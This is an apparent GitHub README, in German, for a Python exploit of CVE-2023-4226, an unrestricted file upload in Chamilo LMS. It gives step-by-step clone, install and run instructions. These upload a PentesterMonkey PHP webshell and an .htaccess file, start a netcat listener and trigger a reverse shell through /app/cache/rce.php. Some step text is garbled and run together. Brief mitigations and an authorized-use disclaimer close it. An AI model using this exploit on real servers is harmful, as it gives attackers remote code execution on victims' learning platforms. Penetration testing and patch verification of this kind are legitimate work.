
Schwachstelle für uneingeschränkten Dateiupload in **Chamilo LMS** (<= v1.11.24).
Python-Skript, das die Ausnutzung von CVE-2023-4226 automatisiert, einer Schwachstelle zum Hochladen von Dateien ohne Einschränkungen in Chamilo LMS (<= v1.11.24). Es lädt eine PHP-Webshell basierend auf PentesterMonkey hoch und konfiguriert .htaccess, um eine Reverse Shell zu erreichen. Weitere Details: Advisory von STAR Labs.
/main/inc/ajax/work.ajax.php hochladen, was zu RCE führt.ch_sidrce.php mit IP und Port./main/work/work.php?cidReq=HW./main/inc/ajax/work.ajax.php, um rce.php und .htaccess hochzuladen./app/cache/rce.php).Python: requests, colorama.
pip install requests colorama
Dateien: rce.php (PentesterMonkey, im Repository enthalten), .htaccess (vom Skript generiert).
Netzwerk: IP und Port für den Listener (z. B. nc -lvnp 4444).
Klone das Repository:
git clone https://github.com/SkyW4r33x/CVE-2023-4226
cd CVE-2023-4226
Setze Ausführungsberechtigungen für das Skript:
chmod +x CVE-2023-4226.py
Installiere Abhängigkeiten:
pip install requests colorama
Starte den Listener in einem Terminal:
nc -lvnp 4444
Führe das Skript aus:
./CVE-2023-4226.py
Gib ein:
ch_sid.Greife auf die Webshell zu, um die Reverse Shell zu starten:
http://<chamilo>/app/cache/rce.php
Beispiel: http://chamilo.local/app/cache/rce.php
Aktualisiere auf Chamilo >= v1.11.26.
Bereinige Dateinamen.
Blockiere HTML in disable_dangerous_file().
Füge in .htaccess hinzu:
RedirectMatch 403 ^/main/inc/lib/javascript/bigupload/files
Header set X-Content-Type-Options nosniff
Ausschließlich für autorisierte Tests. Nicht autorisierte Nutzung ist illegal.